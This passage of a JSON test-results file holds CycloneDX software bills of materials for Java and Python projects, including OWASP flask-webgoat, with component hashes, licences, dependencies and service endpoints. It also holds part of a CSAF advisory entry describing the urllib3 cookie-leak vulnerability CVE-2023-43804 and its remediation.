"C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-eventbus\\0.3.0\\netflix-eventbus-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-512", "content": "13549ecc52b63986900eefd48441f78687a5ac0f89d752752f3c973e7d664607785a6b8850ef7ab6181cc4f90580301cc0a19f2fc694e3f97d9776bd43f416e9"}, {"alg": "SHA-384", "content": "192c415c11edbc320d0d7b2f41c485bae7dbc20d9f406d0b05a5d02436a005a72d4dc015190748749ac74314f20c496b"}, {"alg": "SHA-256", "content": "387bce0906f22c285ed96bcc520a7581d6abbc418b6c3c1e45a4530eb97d94b1"}, {"alg": "SHA-1", "content": "3f864adbe81f0849729fcbba3fe693c32be739ea"}, {"alg": "SHA3-256", "content": "840ce15c01ed37b974b4c5ab4a75d539afb6c43cad90437504d23884864735d5"}, {"alg": "MD5", "content": "8ad05394a13f658a67d1e4cbf0359402"}, {"alg": "SHA-512", "content": "94a6efc1be744e281211f7856037c057863ad67ee1a45bd4cfc1adbb15216a6cb20ba0d54caa26d902f653efe496098b5e71eb5b2c466b10deb94af7559f67a0"}, {"alg": "SHA3-384", "content": "d8580812de33ef27de8dc91205cf56b2aec19572fcfc7fd49e723ed17e4eb4d853f99627417bd9bd30f1cd7de24b4dcf"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-eventbus", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-eventbus@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "type": "library", "description": "netflix-infix", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\com\\netflix\\netflix-commons\\netflix-infix\\0.3.0\\netflix-infix-0.3.0.jar"}]}}, "group": "com.netflix.netflix-commons", "hashes": [{"alg": "SHA3-256", "content": "14f1ba7c66c7b18a45bb2949f784d9028911bdf80376e1553bd9ed6d15083720"}, {"alg": "SHA-384", "content": "185629545fd32a7b890c4318cb7979f0475fa42e54039c80105c4eb20efbe5eabf0338ab59256440fc6366e9bc84d0e4"}, {"alg": "MD5", "content": "3410072887ca26fc0b7e71a7e91f8e2b"}, {"alg": "SHA-512", "content": "477278c1d16d6753a1a2acdb0edd8189b069db1828dd34d808985b48924257e0971ec190bf6efafb14b962e3e0158f2221c195a83fe9bd38fb1574e6cdbf90d3"}, {"alg": "SHA3-384", "content": "7aa7b6c88a89c3324677846543b54b5151d45370d48309a529e492576c64174958f22564ed0d5b88a24d5b0696554326"}, {"alg": "SHA-256", "content": "7dec45215c262c4f0a42c1f3adb8613788cf43c6ed21274e15c73ea5500d2597"}, {"alg": "SHA-1", "content": "acc65969f7367ddd2f1265e0cd7330509ed530dc"}, {"alg": "SHA3-512", "content": "e0b9054727385449f0d29062959eed8ca5f4dec126b85c82fd04155b136ecdf5a4dc1cb78b837f5ff3b86f72b3241d4507f0d4008f519aced1ff2637eb6df3c5"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "netflix-infix", "purl": "pkg:maven/com.netflix.netflix-commons/netflix-infix@0.3.0?type=jar", "scope": "required", "version": "0.3.0"}, {"bom-ref": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "type": "library", "description": "A Java-based implementation of XPath 1.0 that, in addition to XML processing, can inspect/modify Java object graphs (the library's explicit purpose) and even mixed Java/XML structures.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\commons-jxpath\\commons-jxpath\\1.3\\commons-jxpath-1.3.jar"}]}}, "group": "commons-jxpath", "hashes": [{"alg": "SHA-384", "content": "327139dac9f672ffa772480a754ec6c3125a3057faf7911188a34cc52d088770efe8464bb303e2347be7f55303d24493"}, {"alg": "SHA-512", "content": "351c5f6af0711a955e5d839551833015956812765e9dc35e78bfd7c99656f1ecec5cf6587469229688340f00c2b5d07917993ccb0809561e0dd35b4ffb074d93"}, {"alg": "SHA3-256", "content": "3bbafe102ece8be037419a214a524f0c52fa0c3455322d3c2633f1c075e9efbc"}, {"alg": "MD5", "content": "61a9aa8ff43ba10853571d57f724bf88"}, {"alg": "SHA3-384", "content": "b2913b137433bfc2fe78ed57dc44de5737410947e809c0b8bb1d6a83ad333069e41fd97167c20e9fd3a052c2a7dfa9b8"}, {"alg": "SHA-1", "content": "c22d7d0f0f40eb7059a23cfa61773a416768b137"}, {"alg": "SHA3-512", "content": "e050591ecd10746ffee670e1e95a53afa8b43b01164c3ae581bce9ee0a5410eece3f71d05175486eb4d186de88d5defeebef52730939611951ca1cd50ec978a7"}, {"alg": "SHA-256", "content": "fcbc0ad917d9d6a73c6df21fac322e00d213ef19cd94815a007c407a8a3ff449"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "commons-jxpath", "publisher": "The Apache Software Foundation", "purl": "pkg:maven/commons-jxpath/commons-jxpath@1.3?type=jar", "scope": "required", "version": "1.3"}, {"bom-ref": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "type": "library", "description": "Date and time library to replace JDK date handling", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\joda-time\\joda-time\\2.9.9\\joda-time-2.9.9.jar"}]}}, "group": "joda-time", "hashes": [{"alg": "SHA3-256", "content": "22837a75e07c2c56cb3565e324f157f0850f9df62471293af3a77ec2ad456535"}, {"alg": "SHA-512", "content": "3a6749ecd71ee8d5781821c36d77850a810e72ee33757ec4ee9e3d424676dced7eeb955a432f45edb3694dc14dbe1ee4c608545d6a445b29b86979a7c9829384"}, {"alg": "SHA-384", "content": "76fadb1a66e6e6f9780aef2ca6ecfe6e07c0abb0829cc436c0ebf02186ba571219a290ec4bf1b510059594b146d39eff"}, {"alg": "SHA3-384", "content": "9f4b85b886cd0b78b1404522979c0bd150dfe27f01469a17e943d35f5fad2de37fd88f35c0f0d49613c81a6fc0a8cd6b"}, {"alg": "SHA-256", "content": "b049a43c1057942e6acfbece008e4949b2e35d1658d0c8e06f4485397e2fa4e7"}, {"alg": "SHA3-512", "content": "b7f8c9cac6086a5c7d861e5dfa9a42c1191ae17e9d9bfbae5eea2e1f6e25eb084fcb9bdc6bbb7d9c693d423452c9533b1216648793d5ca31675af23d1a0f0397"}, {"alg": "MD5", "content": "eca438c8cc2b1de38e28d884b7f15dbc"}, {"alg": "SHA-1", "content": "f7b520c458572890807d143670c9b24f4de90897"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "joda-time", "publisher": "Joda.org", "purl": "pkg:maven/joda-time/joda-time@2.9.9?type=jar", "scope": "required", "version": "2.9.9"}, {"bom-ref": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "type": "library", "description": "StringTemplate is a java template engine for generating source code, web pages, emails, or any other formatted text output. StringTemplate is particularly good at multi-targeted code generators, multiple site skins, and internationalization/localization. It evolved over years of effort developing jGuru.com. StringTemplate also generates the stringtemplate website: http://www.stringtemplate.org and powers the ANTLR v3 code generator. Its distinguishing characteristic is that unlike other engines, it strictly enforces model-view separation. Strict separation makes websites and code generators more flexible and maintainable; it also provides an excellent defense against malicious template authors. There are currently about 600 StringTemplate source downloads a month.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\antlr\\stringtemplate\\3.2.1\\stringtemplate-3.2.1.jar"}]}}, "group": "org.antlr", "hashes": [{"alg": "SHA-512", "content": "47f3cfd91906b527b615fd10d27387aafa9f355aa9c18a86861c975091c39895b711fe514ed1597dabe6af2a2705dfc45bb70fb5e30f5d428a48e0d1b02b7856"}, {"alg": "SHA-1", "content": "59ec8083721eae215c6f3caee944c410d2be34de"}, {"alg": "SHA3-256", "content": "6181e67482392f97de747d04dc11418e54ca77888d1d1f6925563fe6a2c1633b"}, {"alg": "SHA-384", "content": "a12c2a95e162207835a2a785f2dfccd4b3d9d9b94741d1b3e171ff04699afc920c549425115c63a95c7941ead3909edf"}, {"alg": "MD5", "content": "b58ca53e518a92a1991eb63b61917582"}, {"alg": "SHA3-384", "content": "d9ccd03170058316ea8c98142afbecb7a3b357dda5cd1253c9b57810449048fae7d79e93d5ba74cb901bd765429d8714"}, {"alg": "SHA3-512", "content": "e75331f732a6c9e280f04438db65c47aa2efb4b07980ad3ce5e227693b47c5959d87e40590e19552f67dc257cc4f187a35ee112e850a6bda9d9e69bba2dba34c"}, {"alg": "SHA-256", "content": "f66ce72e965e5301cb0f020e54d2ba6ad76feb91b3cbfc30dbbf00c06a6df6d7"}], "licenses": [{"license": {"name": "BSD licence", "url": "http://antlr.org/license.html"}}], "name": "stringtemplate", "purl": "pkg:maven/org.antlr/stringtemplate@3.2.1?type=jar", "scope": "required", "version": "3.2.1"}, {"bom-ref": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "type": "library", "description": "A StAX implementation for JSON.", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\org\\codehaus\\jettison\\jettison\\1.3.7\\jettison-1.3.7.jar"}]}}, "group": "org.codehaus.jettison", "hashes": [{"alg": "SHA-512", "content": "1304499b9951cba15f10486a061d91ec91efec7aa039162d5fa3d4effb60596fd1c73152fa46d170bbe065d98718f4c9354403bcee7aa3acd03d7b03aa45eeee"}, {"alg": "SHA-384", "content": "4cf5155094f09370f72e94768d6f1429662fb6dcfe6df00f91d78977d42a61dd62d51f1464d3d79eb7363ded95f53474"}, {"alg": "SHA3-384", "content": "5e88aeeb907a6b304a2125a01b55549633b64ce7a43469eff7fdb82ad9e3dfe2e48696c8fd184b2cec6e6062dd1079eb"}, {"alg": "SHA-1", "content": "7d36a59a0577f11b12088b9e215d6860345b9e1d"}, {"alg": "SHA-256", "content": "b39e77d92f5a682c639c8962980499e6be34b5c9fda7ad4dba3b5fd9e99b5070"}, {"alg": "MD5", "content": "c1ce879e927ca435da0fd2fd6c8a6b60"}, {"alg": "SHA3-512", "content": "c75a5dc446297a1eaac02f36829ea2891ffa5e9a3ca45a888f935d8cd65e6f3cab9c6410b45b36987c23674c243b9d6f0d4371f9efec92b70b92a4355732c329"}, {"alg": "SHA3-256", "content": "e8c94791fa652fbc24dbd55ce3fb3ad3cc703d576f935a4b4d2710148615cf9c"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "jettison", "purl": "pkg:maven/org.codehaus.jettison/jettison@1.3.7?type=jar", "scope": "required", "version": "1.3.7"}, {"bom-ref": "pkg:maven/stax/stax-api@1.0.1?type=jar", "type": "library", "description": "StAX API is the standard java XML processing API defined by JSR-173", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\stax\\stax-api\\1.0.1\\stax-api-1.0.1.jar"}]}}, "group": "stax", "hashes": [{"alg": "SHA3-384", "content": "03ebb8db88d04b7308570c1058aadfb6a81d3d6725b1dd13a049ea984ed1df42d3e0f8163e1229752228cada978fb462"}, {"alg": "SHA-384", "content": "2e6c232d3012064dc17e10c2e5b281728a6771eb0d74868e730caf60fe6f96fdd6145759fbbf9d1aa2e07eb1f49764d6"}, {"alg": "SHA-512", "content": "43c24e8dbffa9b932492c8ccf2b91926b2ba3d1d34b5a9671c689bd24d4c220b996708a9667521641d1abbf29404b653755b6f6f3dc0ad0671f5c09db332ea06"}, {"alg": "SHA-1", "content": "49c100caf72d658aca8e58bd74a4ba90fa2b0d70"}, {"alg": "MD5", "content": "7d436a53c64490bee564c576babb36b4"}, {"alg": "SHA3-256", "content": "8173e3e3a0db17b3dbb80c017268858ecda57c819e5b58dbe202bd8087664bb1"}, {"alg": "SHA-256", "content": "d1968436fc216c901fb9b82c7e878b50fd1d30091676da95b2edd3a9c0ccf92e"}, {"alg": "SHA3-512", "content": "e9a7c234dfeff5d4cabd034a536f31ad5a141e30b0ad2438cf5856dd6c36eeb16c69b8bc1ba3ee6bba91f69cd3cbd450953249f2f0eee0a9a22d49637b575f4d"}], "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "stax-api", "purl": "pkg:maven/stax/stax-api@1.0.1?type=jar", "scope": "required", "version": "1.0.1"}]}, "dependencies": [{"ref": "pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/ch.qos.logback/logback-core@1.2.3?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "dependsOn": ["pkg:maven/org.apache.logging.log4j/log4j-api@2.10.0?type=jar", "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.slf4j/slf4j-api@1.7.25?type=jar", "dependsOn": []}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-autoconfigure@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot-starter-logging@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/ch.qos.logback/logback-classic@1.2.3?type=jar", "pkg:maven/org.apache.logging.log4j/log4j-to-slf4j@2.10.0?type=jar", "pkg:maven/org.slf4j/jul-to-slf4j@1.7.25?type=jar"]}, {"ref": "pkg:maven/org.springframework.boot/spring-boot@2.0.3.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-context@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-aop@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-beans@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-expression@5.0.7.RELEASE?type=jar", "dependsOn": ["pkg:maven/org.springframework/spring-core@5.0.7.RELEASE?type=jar"]}, {"ref": "pkg:maven/org.springframework/spring-jcl@5.0.7.RELEASE?type=jar", "dependsOn": []}], "services": [{"name": "com-piggymetrics-account-controller-AccountController-getAccountByName-service", "endpoints": ["/{name}"], "authenticated": true, "x-trust-boundary": true}, {"name": "com-piggymetrics-account-controller-AccountController-getCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-account-controller-AccountController-saveCurrentAccount-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-auth-controller-UserController-getUser-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-client-AccountServiceClient-getAccount-service", "endpoints": ["/accounts/{accountName}"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-getCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-notification-controller-RecipientController-saveCurrentNotificationsSettings-service", "endpoints": ["/current"]}, {"name": "com-piggymetrics-statistics-client-ExchangeRatesClient-getRates-service", "endpoints": ["/latest"]}]}, "test/sbom-java2.json": {"components": {"frameworks": [{"bom-ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "type": "framework", "description": "JavaBeans Activation Framework (JAF) is a standard extension to the Java platform that lets you take advantage of standard services to: determine the type of an arbitrary piece of data; encapsulate access to it; discover the operations available on it; and instantiate the appropriate bean to perform the operation(s).", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "binary-analysis", "value": "C:\\Users\\user\\AppData\\Local\\Temp\\mvn-deps-NPbV0h\\javax\\activation\\activation\\1.1\\activation-1.1.jar"}]}}, "group": "javax.activation", "hashes": [{"alg": "SHA-256", "content": "2881c79c9d6ef01c58e62beea13e9d1ac8b8baa16f2fc198ad6e6776defdcdd3"}, {"alg": "SHA3-256", "content": "5fb94d2742cc3d44abad42c5d61b9c7464a2ef33bc58b4b5b121d49799123460"}, {"alg": "MD5", "content": "8ae38e87cd4f86059c0294a8fe3e0b18"}, {"alg": "SHA-512", "content": "c0ff5bf3ace7acc1b31fcc109cee48d9eb8f025ae15a31dc91eca760933bdb97c93f05d61e95af1e317859d72e5f179f897f5bf3df0e3810f4212d43bacee4bd"}, {"alg": "SHA-384", "content": "c4ee54d80a2e67e819700051d6cfa01a17631c89f942b8690afb601e491f02d7497fe57bd5c70edfb9b444ae8222b846"}, {"alg": "SHA3-512", "content": "c5e37fe3d9c420a9035f1160eb1d396e94f01851c01c6e2f19f19a221bfc484e63f9660c7377f58aa65246b95a9eb799ac4e6798c0b20f658edf00a4435e1efa"}, {"alg": "SHA3-384", "content": "de0777d2d1d7aad105defb12aed17ef38abfe89db2449c5243fa3c69304ea24dd8df0881330351d0733313e8f7252814"}, {"alg": "SHA-1", "content": "e6cb541461c2834bdea3eb920f1884d1eb508b50"}], "licenses": [{"license": {"id": "CDDL-1.0"}}], "name": "activation", "purl": "pkg:maven/javax.activation/activation@1.1?type=jar", "scope": "required", "version": "1.1"}], "libraries": [{"bom-ref": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "type": "library", "description": "Turbine Stream Service", "group": "com.piggymetrics", "licenses": [{"license": {"id": "Apache-2.0"}}], "name": "turbine-stream-service", "purl": "pkg:maven/com.piggymetrics/turbine-stream-service@0.0.1-SNAPSHOT?type=jar", "version": "0.0.1-SNAPSHOT"}]}, "dependencies": [{"ref": "pkg:maven/javax.activation/activation@1.1?type=jar", "dependsOn": []}]}}}, "result_5": {"diff_summary": {"bom_1.json": {}, "bom_2.json": {}}, "common_summary": {"components": {"libraries": [{"bom-ref": "pkg:pypi/requests@2.31.0", "type": "library", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}]}}, "name": "requests", "properties": [{"name": "SrcFile", "value": "/home/runner/work/src_repos/python/django-goat/requirements_tests.txt"}], "purl": "pkg:pypi/requests@2.31.0", "version": "2.31.0"}]}}}, "result_6": {"test/sbom-python.json": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "test/sbom-python2.json": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}}, "result_7": {"bomFormat": "CycloneDX", "components": [{"bom-ref": "pkg:pypi/flask@1.1.2", "evidence": {"identity": {"confidence": 1, "field": "purl", "methods": [{"confidence": 1, "technique": "instrumentation", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\venv"}]}, "occurrences": [{"location": "flask_webgoat\\__init__.py#20"}, {"location": "flask_webgoat\\actions.py#13"}, {"location": "flask_webgoat\\actions.py#16"}, {"location": "flask_webgoat\\actions.py#19"}, {"location": "flask_webgoat\\actions.py#22"}, {"location": "flask_webgoat\\actions.py#34"}, {"location": "flask_webgoat\\actions.py#4"}, {"location": "flask_webgoat\\actions.py#46"}, {"location": "flask_webgoat\\actions.py#49"}, {"location": "flask_webgoat\\actions.py#6"}, {"location": "flask_webgoat\\actions.py#7"}, {"location": "flask_webgoat\\auth.py#13"}, {"location": "flask_webgoat\\auth.py#23"}, {"location": "flask_webgoat\\auth.py#25"}, {"location": "flask_webgoat\\auth.py#35"}, {"location": "flask_webgoat\\auth.py#4"}, {"location": "flask_webgoat\\auth.py#44"}, {"location": "flask_webgoat\\auth.py#46"}, {"location": "flask_webgoat\\status.py#13"}, {"location": "flask_webgoat\\status.py#3"}, {"location": "flask_webgoat\\status.py#8"}, {"location": "flask_webgoat\\ui.py#14"}, {"location": "flask_webgoat\\ui.py#19"}, {"location": "flask_webgoat\\ui.py#24"}, {"location": "flask_webgoat\\ui.py#6"}, {"location": "flask_webgoat\\users.py#14"}, {"location": "flask_webgoat\\users.py#18"}, {"location": "flask_webgoat\\users.py#24"}, {"location": "flask_webgoat\\users.py#3"}, {"location": "flask_webgoat\\users.py#33"}, {"location": "flask_webgoat\\users.py#44"}, {"location": "flask_webgoat\\users.py#46"}, {"location": "flask_webgoat\\users.py#7"}]}, "name": "flask", "properties": [{"name": "ImportedModules", "value": "flask.redirect,flask.render_template,flask.jsonify,flask.Blueprint,flask.session,flask.g,flask.request,flask.Flask"}], "purl": "pkg:pypi/flask@1.1.2", "type": "framework", "version": "1.1.2"}, {"bom-ref": "pkg:pypi/werkzeug@1.0.1", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Werkzeug", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/werkzeug@1.0.1", "type": "library"}, {"bom-ref": "pkg:pypi/jinja2@2.11.3", "evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "name": "Jinja2", "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "purl": "pkg:pypi/jinja2@2.11.3", "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"evidence": {"identity": {"confidence": 0.8, "field": "purl", "methods": [{"confidence": 0.8, "technique": "manifest-analysis", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}]}}, "properties": [{"name": "SrcFile", "value": "C:\\Users\\user\\PycharmProjects\\flask-webgoat\\requirements.txt"}], "type": "library"}, {"bom-ref": "pkg:github/actions/checkout@v2", "group": "actions", "name": "checkout", "purl": "pkg:github/actions/checkout@v2", "type": "application", "version": "v2"}, {"bom-ref": "pkg:github/actions/setup-python@v2", "group": "actions", "name": "setup-python", "purl": "pkg:github/actions/setup-python@v2", "type": "application", "version": "v2"}], "dependencies": [{"dependsOn": ["pkg:pypi/flask@1.1.2"], "ref": "pkg:pypi/flask-webgoat@latest"}, {"dependsOn": [], "ref": "pkg:pypi/werkzeug@1.0.1"}, {"dependsOn": ["pkg:pypi/markupsafe@1.1.1"], "ref": "pkg:pypi/jinja2@2.11.3"}, {"dependsOn": [], "ref": "pkg:pypi/markupsafe@1.1.1"}, {"dependsOn": []}, {"dependsOn": []}], "metadata": {"authors": [{"name": "OWASP Foundation"}], "component": {"bom-ref": "pkg:gem/flask-webgoat@latest", "name": "flask-webgoat", "purl": "pkg:gem/flask-webgoat@latest", "type": "application", "version": "latest"}, "lifecycles": [{"phase": "build"}], "tools": {"components": [{"author": "OWASP Foundation", "bom-ref": "pkg:npm/@cyclonedx/cdxgen@10.2.1", "group": "@cyclonedx", "name": "cdxgen", "publisher": "OWASP Foundation", "purl": "pkg:npm/%40cyclonedx/cdxgen@10.2.1", "type": "application", "version": "10.2.1"}]}}, "services": [{"authenticated": false, "endpoints": ["/grep_processes", "/message"], "name": "actions-service"}, {"authenticated": false, "endpoints": ["/login", "/login_and_redirect"], "name": "auth-service"}, {"authenticated": false, "endpoints": ["/ping", "/status"], "name": "status-service"}, {"authenticated": false, "endpoints": ["/search"], "name": "ui-service"}, {"authenticated": false}], "specVersion": "1.5", "version": 2}, "result_8": {"components": [{"version": "1.0.1"}, {"version": "2.11.3"}, {"bom-ref": "pkg:pypi/markupsafe@1.1.1", "name": "MarkupSafe", "purl": "pkg:pypi/markupsafe@1.1.1", "version": "1.1.1"}, {"bom-ref": "pkg:pypi/itsdangerous@1.1.0", "name": "itsdangerous", "purl": "pkg:pypi/itsdangerous@1.1.0", "version": "1.1.0"}, {"bom-ref": "pkg:pypi/click@7.1.2", "name": "click", "purl": "pkg:pypi/click@7.1.2", "version": "7.1.2"}], "dependencies": [{"ref": "pkg:pypi/itsdangerous@1.1.0"}, {"ref": "pkg:pypi/click@7.1.2"}, {"dependsOn": ["pkg:pypi/click@7.1.2", "pkg:pypi/itsdangerous@1.1.0", "pkg:pypi/jinja2@2.11.3", "pkg:pypi/werkzeug@1.0.1"], "ref": "pkg:pypi/flask@1.1.2"}], "services": [{"endpoints": ["/create_user"], "name": "users-service"}]}, "result_9": {"components": [{"version": "1.5.1"}, {"version": "2.10.2"}]}, "result_13": {"diff_summary": {"test/csaf_1.json": {"vulnerabilities": [{"acknowledgements": [{"organization": "NVD", "urls": ["https://nvd.nist.gov/vuln/detail/CVE-2023-43804"]}], "cve": "CVE-2023-43804", "cwe": {"id": "200", "name": "Exposure of Sensitive Information to an Unauthorized Actor"}, "discovery_date": "2023-10-02T23:27:05", "ids": [{"system_name": "CVE Record", "text": "CVE-2023-43804"}, {"system_name": "GitHub Advisory", "text": "GHSA-v845-jxx5-vc9f"}, {"system_name": "GitHub Advisory", "text": "PYSEC-2023-192"}], "notes": [{"category": "details", "details": "Vulnerability Details", "text": "# `Cookie` HTTP header isn't stripped on cross-origin redirects urllib3 doesn't treat the `Cookie` HTTP header special or provide any helpers for managing cookies over HTTP, that is the responsibility of the user. However, it is possible for a user to specify a `Cookie` header and unknowingly leak information via HTTP redirects to a different origin if that user doesn't disable redirects explicitly.  Users **must** handle redirects themselves instead of relying on urllib3's automatic redirects to achieve safe processing of the `Cookie` header, thus we decided to strip the header by default in order to further protect users who aren't using the correct approach.  ## Affected usages  We believe the number of usages affected by this advisory is low. It requires all of the following to be true to be exploited:  * Using an affected version of urllib3 (patched in v1.26.17 and v2.0.6) * Using the `Cookie` header on requests, which is mostly typical for impersonating a browser. * Not disabling HTTP redirects * Either not using HTTPS or for the origin server to redirect to a malicious origin.  ## Remediation  * Upgrading to at least urllib3 v1.26.17 or v2.0.6 * Disabling HTTP redirects using `redirects=False` when sending requests. * Not using the `Cookie` header.  ## Related CVE(s) CVE-2023-43804, PYSEC-2023-192"}, {"category": "description", "details": "Vulnerability Description", "text": "`Cookie` HTTP header isn't stripped on cross-origin redirects"}], "product_status": {"known_affected": ["urllib3@vers:pypi/>=2.0.0|<2.0.6"], "known_not_affected": ["urllib3@2.0.6"]}, "references": [{"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory PYSEC-2023-192", "url": "https://github.com/pypa/advisory-database/tree/main/vulns/urllib3/PYSEC-2023-192.yaml"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "GitHub Advisory GHSA-v845-jxx5-vc9f", "url": "https://github.com/urllib3/urllib3/security/advisories/GHSA-v845-jxx5-vc9f"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Debian Mailing List Announcement", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00012.html"}, {"summary": "Fedora Project Mailing 